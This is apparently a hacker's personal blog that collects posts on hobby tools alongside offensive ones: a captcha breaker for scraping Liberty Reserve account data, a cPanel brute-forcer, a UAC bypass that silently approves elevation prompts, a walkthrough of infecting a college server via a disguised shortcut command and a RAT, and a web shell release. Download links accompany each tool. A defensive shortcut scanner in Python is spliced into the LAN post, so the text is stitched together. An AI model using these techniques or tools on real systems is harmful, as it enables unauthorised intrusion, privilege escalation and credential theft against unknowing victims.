A simple JavaScript Hyperterminal made out of an MSCOMM supplement

A few days back one of my friends asked me about the possibility of accessing client-side serial ports via JavaScript. Well, it was impossible the direct way, but there are many client-side serial port plugins available for all browsers (eg: seriality); even a Chrome App could get direct read/write access to the serial ports. That's when it struck me that the same could be implemented in an IE App (HTA) with very little effort by using ActiveX.

The first name which pops into the mind of a programmer for a simple serial communication object would be MSCOMM, and honestly it's been a while since I used it, as I always preferred Martin Gibson's commMG library because it was more functional than any native object. But to achieve our aim we need an object, and MSCOMM has all sorts of problems like its licensing etc.

That's when I stumbled upon another object (netcommOCX) which has all the properties, events and methods exactly like MSCOMM. By using it I made a simple JavaScript hyperterminal, which I hope will be useful to other amateur programmers like me.

NOTE: For those who want to test the serial port functionality it would be better to install and use this COM port emulator (null modem emulator).
I have uploaded the source code with the .hta application. Feel free to drop in your comments.

Download Link: http://www.filefactory.com/file/3ug2c2c4326j/n/javascript_hyperterminal_zip

All credits for this project go to Ashutosh Singh, who inspired me for this out-of-the-box project.

Defeating Captcha by image reconstruction!

Hi Friends,
It's been a month since my last blog post, so today I will be blogging about a captcha project I did recently, which unfortunately ended up as a waste of time as the target went offline the very day the project was completed.

The project was to dump all publicly available user info from libertyreserve, as they had a service with which users could get info of other users by just entering the target user's account no. (eg: U1234567). But it couldn't be automated as it was protected with captchas. I did a quick research on it and found out those captchas were not from any third-party captcha provider. I also found out a few other things about the libertyreserve captcha:
1. Their turing no. had no relation with the captcha produced.
2. The same turing no. can be used again and again.
3. The captcha had an expiry time of 15 minutes.

eg:https://www.libertyreserve.com/captcha.jpg?c=yhrsxh1mAEC382HO9sLN0Q
and
https://www.libertyreserve.com/captcha.jpg?c=test

Both are harvested captchas.

So that part was ready, but still there was another problem: those images had to be correctly decrypted with an OCR. Well, as you all know Tesseract is one of the freely available OCRs on the internet. So I decided to decrypt these images with it, but still encountered problems, as those captcha images were filled with junk colours or lines so as to prevent automation, and they had no good pixel depth, so I had to redress those images before parsing them with Tesseract.

One of the obfuscation methods of libertyreserve captchas was that they filled the image area with craters to confuse the OCR into a new alphabet (not much of an obfuscation though). So my first step was to close those gaps with the mean colour of the surrounding pixels. As liberty reserve captchas were bicoloured (ie white as background and image in red) it was quite easy for me, as I just had to find the amount of red in it.

So the architecture was ready; all I had to do now was to:
read all the pixels in the 200*75 image one by one,
get the RGB colour of each,
calculate the amount of red in it; if found less than 224, consider it a red colour,
find the distance between the last red and the last white and if found to be greater than 3 pixels fill up that area.

Make a function to do the above mentioned things both vertically and horizontally.

AutoIt doesn't have a native function to get the pixel at a coordinate of an image, so I had to rely on a library named FastFind compiled in C++. The benchmark of my function was 2.7 seconds including the time Tesseract took to interpret it.
Below is an example of a captcha before and after redressing.

[Image: Captcha before redressing]

[Image: Captcha after redressing]

Once redressed the pixel depth of the image is automatically increased, so we don't need to convert it into "tiff" before parsing with Tesseract. You can try it out manually with this command:

tesseract.exe 0393.jpeg output -psm 7 digits

Well, as for other captcha templates, using ImageMagick would be better as it can save your coding time and fill our limitations. I am currently developing a custom OCR which can be taught by even a kid; I will be blogging about it once I am done with it. I have uploaded both the source and the libraries used in this project. Feel free to drop in your comments.

Download Link: http://www.filefactory.com/file/6ipm45m7a3p9/n/captcha_project_zip

All credits for this project go to my brother LNXROOT and Abhilyall.

SOES – [Shell On Every Server]

It's been a while since I made bruting scripts. After two years I am releasing today another perl script to the hacking community.
I can't take credit for all the programs I make, as it's someone else who inspires me with the idea for the program.

And 99% of the hacking tools I have made were my brother's (LNXROOT) idea.
So enough of the blabbering. Just as the wordpress & joomla bruter was a revolution to the hacking community, I release SOES – [Shell On Every Server].
SOES comes from the very lineage of my previous bruters.
But what makes SOES unique is that it's a bruter with an intelligence, or an induced intelligence.
We aspiring hackers have seen many bruters / scripts which brute cPanels.

Yes, and it's no big deal... as once we shell a server one of the first things hackers do is to upload the cPanel bruting php scripts which extract usernames from /etc/passwd or /etc/mail or the /home directory and brute users for default passwords such as 1233456 or admin or password etc. But what if you want to brute an unknown server's cPanel?

It's practically impossible, or so people were thinking about it, but with SOES we can find the usernames of any website residing on any shared server with a success rate of 70% and brute the shit out of it!! :)
And moreover it's powered by logontube's API, one of the best reverse IP services by the hacking community, which gives the best and most accurate results.

Note: the tool is a bit slow as I haven't incorporated threads in it.

I hope that would do for the day. As with all my projects SOES is also open source, so feel free to modify it to your needs other than the Coded By headers.

Download link: http://www.mediafire.com/?ja6kovo3ivefou9

The Bible (v1.0)

                                                            


From the developer’s desk

“A rich store of salvation, wisdom and knowledge... the fear of the Lord is the key to this treasure”... These are the words that God foretold through his beloved prophet Isaiah.
The New International Version of the Bible (NIV) is an abridged version which was developed by the cryptic and hieroglyphic scholars who translated the scripts from Aramaic, Greek and Hebrew.
The prologue of God's chosen race and their journey through the deserted lands surrounded by enemies and hardships... from exile to the promised land. This saga of the exodus relates to our day to day life.
‘Creation, Life and beauty... undone by death and wrongdoing... Regained by God's surprising victory’... Through the books of Genesis to Revelation God Almighty unfolds his plan for saving the human race from the clutches of sin... right down the lane from the Old Testament to the visions of St. John where he prophesies the End of Days.
... The songs of Salvation are proclaimed... “Seek and you shall find”... Through my pursuit for the truth I augmented this software to share my reflections on the Holy Bible.

The Offline Bible is a contemporary approach... an advanced tool devised to enhance our research on the scriptures. Being a common man I have incorporated all possible ways to assist you on your path to enlightenment.
The feeds in this program are exactly as they appear in the NIV version of the Holy Bible, and the sources are encrypted against manipulation.
I kindheartedly welcome you to heed the sanctifying words of God Almighty. One of the pioneering features I have added is that the program gets along with all known operating systems, consuming less than 5% of your hard disk space, and it's quite portable.
You can carry it along on your flash drives, smart storage cards or your PDA.

Passage Lookup: You have the privilege to read the Holy scriptures along with the markers that help you to bring up the particular chapters or books by typing in the suitable keywords. For instance, for the Book of Malachi,
Mal 2:1-10 brings up Malachi chapter 2, verses 1 through 10. The passage will be displayed instantly on the screen with highlighted verses. You can zoom in on the view and customize the fonts for better reading conditions.

Keyword Search:
Suppose you have a vague memory of a passage or an instance but are unable to figure out which book it is taken from. If there's a striking keyword in that passage that keeps the memory fresh, you just turned lucky...
Just run a random search for that keyword, and this feature will search the entire bible for passages containing that word. The results will be brought to your gaze in a matter of seconds, with all possible hits.

Bookmark+:
Bookmarks, an ease-of-access tool, help you to bring up the last passage you were reflecting on. The add-on feature in this part of the Offline Bible is the link between a keyword and a passage. Perhaps you are preparing notes on the inception of mankind,
detailed in the Book of Genesis. So the keyword “creation” can be used to bring up the passage Genesis 2 verses 1-12. I employed this tool to create a decisive study... bookmark+ brings the combined effect of NOTES AND BOOKMARKS, which can aid in research and ease access to the most visited chapters.
This in turn can make your scripture reading fruitful and blessed.

This version lacks in some areas which I overlooked. Perhaps the Index would have been wonderful... And the on-screen narrator (a.k.a. passage-to-speech processor) would aid my fellow brethren with eye defects.
I would rectify these faults in my next version. Besides, this is an open-source program, and I gladly welcome you to restructure this project or add other biblical databases to the program, like the Catholic Good News version or the King James version.

Download: http://sourceforge.net/projects/thebible/

Your feedback enables me to grasp more knowledge, so please feel free to drop down your word for me.
May the grace of the Lord Almighty find you and enlighten you, my dear brothers and sisters.

-Daryl

Developer's Testimony

Well... this project is one of the most time-consuming projects I have ever made...

The whole idea for this project came when I was into bible study and, as the lazy person I am, I found it hard to browse through the bible for each passage.

The articles were so long and the passage references were in the hundreds; it would have taken me years to read the articles by referring to the passages from the bible. So I created a small program which harvests the links of the respective passages to the corresponding biblegateway links. It was awesome, and I could finish half of the articles in about a month.

But it was completely useless when there was no internet connectivity, as biblegateway's bible was an online service and they provided no download links for the bible... so it was my mother who inspired me to make a program, an offline and portable bible... she filled my mind with the ideas of features she needed for the application...

What more does a developer need?

I was wired in and coding... it may surprise you, but it took me 31 days to code it.

The first and foremost part was the architecture and the source.

The architecture, how the program should work, was made in a day. Next was the source... as we all know there are no publicly available bible databases for download, so my options were narrowed down to Biblegateway.com.
But the hardest part was that they had no specific algorithm or structure for their displayed style source. Although it was a hard nut, with the previous experience I had in deobfuscation and most of all by my GOD's help I could find a pattern in their source, so I quickly made a perl script which sends GET requests in loops for all the chapters of all the books in the bible to biblegateway, thereby extracting all the source.
And with the help of the algorithm I made I deobfuscated them book by book, chapter by chapter and verse by verse and added it to an sqlite database.

Now this whole process cost me 11 days; as I said before, they had no specific pattern in their style obfuscation, so I had to remake the algorithm again and again.
And the rest of the days were taken for me to code its GUI...
As it takes only creative people to code GUIs in a day :D :D

I have uploaded the source code of the application and the scripts I used for extraction and deobfuscation along with the binaries on sourceforge.net.

You can freely redevelop the application or add other bible DBs to it like the KJV version,
provided you give credits to the guy who took the time and pain to code it from 0% to 100%.

And as I wrap up Project Zion, all the credits for this project go to my mother Lilly Varghese.

-Daryl

DyNaMiC PrOxY_1.0

Hi friends,
This was an old project I was into a few months ago, which had to be suspended in between due to incompatibility with 64-bit systems.

The idea for this project was conceived by LNXROOT, and the moment he shared it with me I understood it was an awesome idea, as there was no proxy application till now which fetched proxies in realtime and changed the system proxy in user-defined time intervals.
The idea was foolproof. But it had to be coded; the best online web proxy with the largest number of proxies was HideMyAss.com.
But there were a lot of hurdles to overcome before completing the project. One of them was the deobfuscation of the proxies from hidemyass.com: as explained in the last post, I had to develop a custom style interpreter to deobfuscate the proxies from the page source.
The next hurdle was changing the system proxy. As you all know it's easy to change the system proxy via the registry, but changing it in realtime was not possible, as once changed through the registry the browser had to be reloaded / internet settings had to be refreshed. My first approach was to run inetcpl.cpl and get the frame handle, later on enabling the system proxy, but it didn't work out as I planned, so at last I found a way to accomplish it by using the Windows API (wininet.dll).

I have uploaded both the source and binaries. ENJOY!!
And do let me know if there are any bugs.

Please do share and comment if you like the application.
Download link: https://sourceforge.net/projects/dynamicproxy/

http://www.filefactory.com/file/5t0happllspp/n/Dynamic_Proxy_v1_0_build_rar

All credits go to my brother LNXROOT.

Deobfuscating HideMyAss Proxies

A few days back I did a Dynamic Proxy project for my brother LNXROOT. Although it was a simple project it has not been released due to some compatibility issues on 64-bit computers. So, the proxy application retrieved fresh online proxies from HideMyAss.com in real time and changed the system proxy settings in user-defined intervals.

Sounds easy, right?

But it wasn't so easy to code it, as HideMyAss obfuscates its proxies via style obfuscation, and the real challenge was to create a partial CSS interpreter. Eventually I was able to code it, although I experienced some troubles with its regex. And I have to say the AutoIt Forums are very helpful to a novice like me. Fluttershy from the AutoIt forums later on also came up with a small and fast UDF for hidemyass. Anyway, I have uploaded my source of the deobfuscator and a small application which works via my function to extract hidemyass proxies, for those who don't know AutoIt and are not into coding.

Here is the download link: http://www.filefactory.com/file/pmwe1np6flr/n/Proxy_extractor_1_0_releasepack_rar

This release pack includes the binaries and the source.

Now apart from coding I have something to share: we often forget / fail to remember the people who stood beside us, helped and supported us before we became the ones we are right now. If I have ignored any of such people knowingly or unknowingly I am really sorry; it just keeps happening because I spend 15 hours a day on a computer.

All thanks go to my brother Ankur Tiwari, who was always there at my side ready to help me in whatever way possible!!

UAC a total Joke!

A few days back I developed a simple program to bypass UAC prompts. Now you may ask why we should bypass UAC when we can configure it or even disable it. Well, there are many reasons for it;
my reason to develop the program was to execute with elevated privileges on the host PC without the knowledge of its user.

In Windows 7, although the user belongs to the administrator local group, a process can only be run with system privileges if it's verified by UAC (provided UAC is turned on). My first approach was to run a task with elevated privileges from the task manager, as there is provision for it,

ie to run the task with administrative privileges after clicking the button “Show processes from all users”.

I was successful to a limit in automating it, ie till clicking the button, by first getting the handle to the task manager window and later on control-clicking the button control.

No program can simulate the above, and these actions can only be done by a genuine user.

What I didn't know was that UAC was designed to NOT be automated. As soon as we click the button the task manager restarts, and it can't be attached to / a handle can't be obtained to it.
At first I thought it to be a bug in the Send function in AutoIt, but later on understood the reason.

I didn't want to run a local root exploit every now and then to run a program with system privileges, as it was not cool and I didn't want to rape a computer again and again, so I was searching for another way when I stumbled upon accent's IOFunction (all credits go to him), derived from InpOut32, which is a Windows DLL and driver to give direct access to hardware ports (for example the parallel and serial port) from user level programs. It was originally developed by the people at Logix4U for Windows 9x and 32-bit variations of NT (NT/2000/XP/2003 etc.).

Well, this was huge. I mean, when UAC (process name: consent.exe) is invoked, no process, irrespective of its inherited privileges, could get a handle or even at least send keys expecting the UAC window to be in focus. So with inpout32 I could get direct access, ie equivalent to sending keys from the keyboard. Even though this was a big breakthrough I couldn't solve the riddle, because to install a driver in Windows versions prior to Vista it has to be registered or at least copied into the %system% directory (doesn't work all the time), which apparently needed admin privileges.

It was then that by chance I came to notice that the folder action confirmation form was not protected by UAC.

But still there was no way we could invoke this form programmatically, ie a basic copy function from an exe just fails if it hasn't enough privileges. Now, since Windows considers all human actions, which include shortcuts, as genuine user operations, I could copy inpout32 into the clipboard and then, by mimicking a Ctrl+V, I could literally fool Windows into copying/installing those DLLs into the system directory.

With that done, the next part was in fact to actually bypass UAC.
For that all I had to do was to check whether the process consent.exe was actually running and send keys via the IOFunction:
"0x38" ; ALT down
"0x15" ; Y
"0xB8" ; ALT up (0x38+0x80)

thereby bypassing UAC and executing any desired program with elevated privileges.
I reported it to Microsoft Security Response Center a month after the finding and they responded:
“This behavior is By Design– that is, Windows allows users to install 3rd party drivers, which by necessity have privileges that user-mode applications do not. We do not consider UAC a security boundary.”
I have attached both the source code (in AutoIt) and the binaries of the POC, which works on a Windows Ultimate 32-bit system.
I haven't tested it on 64-bit Windows Ultimate, and I believe it should work.

UPDATE: Tested it on Windows 8 and it works like a charm!

Here are the download links:

21/11/2012

http://www.filefactory.com/file/shanbpdihat/uacrefurnish.rar

http://www.fileserve.com/file/zcxFK6K/b47chguru.rar 

http://www.filefactory.com/file/2e4mon04nhy9/n/b47chguru_rar

Thanks to my brother LNXROOT, who has always been at my side supporting and inspiring me :)

Logontube now provides the reverse IP service!!

Finally, after a long time, logontube is up and running. Thanks to all my friends who have supported me throughout my every project. logontube now provides a reverse IP service for free!! :)
Unlike other online reverse IP services, which are only based on Google, logontube uses all the available search engines to maximise the results, and the results are verified so that there are no false positives!
Each time a reverse IP search on a unique IP is done, all the results are stored in the website's reverse IP database.
The database is available for public download free of cost every first of the month, or anyone who urgently needs it (hackers/students/webmasters etc.) can mail me at interestingpal@gmail.com or daryl.varghese@facebook.com.

Moreover, logontube also offers free access to its reverse IP API, so that anyone who wants to incorporate the reverse IP service into their tools can use the API in the following way:

A GET request to http://reverseip.logontube.com/?site=logontube.com

The results will be returned in plain text.
For any queries or suggestions mail me at interestingpal@gmail.com

Hacking a computer on LAN with its network share drive

It's been a while since I have blogged, so today I would be describing how to hack into a PC on LAN which has a network shared drive. As the saying goes, “Necessity is the Mother of Invention”: 6 months before, when I was at my college hostel, by mistake I did an IP scan on our network and found the college admin server had a network shared drive with read/write privileges. So just like any person my first thought was to find an exploit in exploit-db or packetstorm or 1337day, but to my bad luck there weren't any remote root exploits for Windows Server 2003.
So I thought it's better to do some social engineering technique and fool the admin into running my RAT (z77), but it had to be done with the least human interaction. So I decided to use the propagation technique used by the win32:sality 2nd gen virus. Unlike other viruses it doesn't use autorun / folder-to-folder copying techniques for spreading; what it does is that it makes a malicious shortcut to a folder and sets the folder attributes to hidden. Now here is the best part: the shortcut itself is malicious. For those who don't know the parts of a shortcut/.lnk file in Windows:

The Windows shortcut file contains these parameters:
Working directory
Target directory
Additional file arguments
Description
Icon
Icon number

So by tampering with it, it is possible to open both the folder and the executable file; the user won't know a thing about it because the icon index will be set to 4, which is the folder icon.

ex:

%windir%\system32\cmd.exe /c start EXPLORER.EXE study & start RECYCLE.BIN\t2.exe

Tampering the target directory parameter with the above command opens the folder named study and at the same time executes the file t2.exe.

So now that I had the technique, I coded a simple tool in my favourite language perl to do the above on all the folders on the shared folder. Still there was a problem left out: as it had to be done with less human interaction, how to make the victim click the shortcut file?

For that I modified my perl code to make copies of large files on the network share so that eventually the drive's free space would run out, thereby getting the attention of the victim, and the victim, when trying to investigate the matter, accidentally clicks our malicious shortcut and gets infected.
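From the defender's side, the shortcut trick above leaves a recognisable footprint on a share: a .lnk that shows a folder icon but targets cmd.exe, chains two `start` verbs, and sits beside a hidden folder of the same name. The scanner below is an added example, not code from the original post; it assumes the .lnk fields have already been extracted by a shortcut parser, and the directory listing and shortcuts it checks are constructed sample data.

```python
"""Heuristic scanner for folder-impersonating shortcuts on a network share.
Added example; the .lnk fields are assumed to come from a shortcut parser,
and all sample data below is constructed."""
from dataclasses import dataclass
import re


@dataclass
class Shortcut:
    name: str           # shortcut file name, e.g. "study.lnk"
    target: str         # target path stored in the .lnk
    arguments: str      # command-line arguments stored in the .lnk
    icon_index: int     # icon index stored in the .lnk


@dataclass
class DirEntry:
    name: str
    is_dir: bool
    hidden: bool


FOLDER_ICON_INDEX = 4   # icon index the post gives for the folder icon
START_RE = re.compile(r"\bstart\b", re.IGNORECASE)
CMD_SWITCH_RE = re.compile(r"(^|\s)/c\b", re.IGNORECASE)


def analyse_shortcut(sc: Shortcut, entries: list) -> list:
    """Return the indicators matched by one shortcut (empty list = clean)."""
    reasons = []
    exe = sc.target.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    # 1. A shortcut that runs a command line via cmd.exe /c is not a document link.
    if exe == "cmd.exe" and CMD_SWITCH_RE.search(sc.arguments):
        reasons.append("target is cmd.exe /c")
    # 2. Two or more 'start' verbs chained with '&': decoy folder plus payload.
    n_start = len(START_RE.findall(sc.arguments))
    if n_start >= 2 and "&" in sc.arguments:
        reasons.append(f"{n_start} chained 'start' commands")
    # 3. An executable target displayed with the folder icon.
    if exe.endswith(".exe") and sc.icon_index == FOLDER_ICON_INDEX:
        reasons.append("executable shown with folder icon")
    # 4. A hidden folder carrying the shortcut's own name sits beside it.
    stem = re.sub(r"\.lnk$", "", sc.name, flags=re.IGNORECASE).lower()
    if any(e.is_dir and e.hidden and e.name.lower() == stem for e in entries):
        reasons.append(f"hidden folder '{stem}' next to shortcut")
    return reasons


def scan_share(entries: list, shortcuts: list, threshold: int = 2) -> dict:
    """Map each shortcut name to its indicators when at least `threshold` match."""
    hits = {}
    for sc in shortcuts:
        reasons = analyse_shortcut(sc, entries)
        if len(reasons) >= threshold:
            hits[sc.name] = reasons
    return hits


# Constructed sample: one decoy shortcut using the post's command line, one benign one.
SAMPLE_ENTRIES = [
    DirEntry("study", is_dir=True, hidden=True),
    DirEntry("study.lnk", is_dir=False, hidden=False),
    DirEntry("Notes.lnk", is_dir=False, hidden=False),
]
SAMPLE_SHORTCUTS = [
    Shortcut("study.lnk", r"%windir%\system32\cmd.exe",
             r"/c start EXPLORER.EXE study & start RECYCLE.BIN\t2.exe", FOLDER_ICON_INDEX),
    Shortcut("Notes.lnk", r"C:\Windows\System32\notepad.exe", "", 0),
]

if __name__ == "__main__":
    for name, reasons in scan_share(SAMPLE_ENTRIES, SAMPLE_SHORTCUTS).items():
        print(name, "->", "; ".join(reasons))
```

A shortcut to a real folder with the folder icon is not flagged, because indicator 3 only fires when the target is an executable.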

I have coded a similar program in AutoIt for my bro j4v3dkhan.


D.K shell a reality..!!!

After 7 months of researching and developing...
D.K shell is finally released. I hope it will be the shell any hacker would love to use. Well, I had to face lots of problems during its development; one of them was developing the auto password changer for vb,

as vb uses an md5 hash and a salt to process the passwords.
The second was getting the symlink feature to work without a timeout when executed on a server having more than 3000 sites hosted on it.

Anyway, it's done. Altogether D.K shell is the next generation web shell for hackers!!
Download link: http://sourceforge.net/projects/icfdkshell/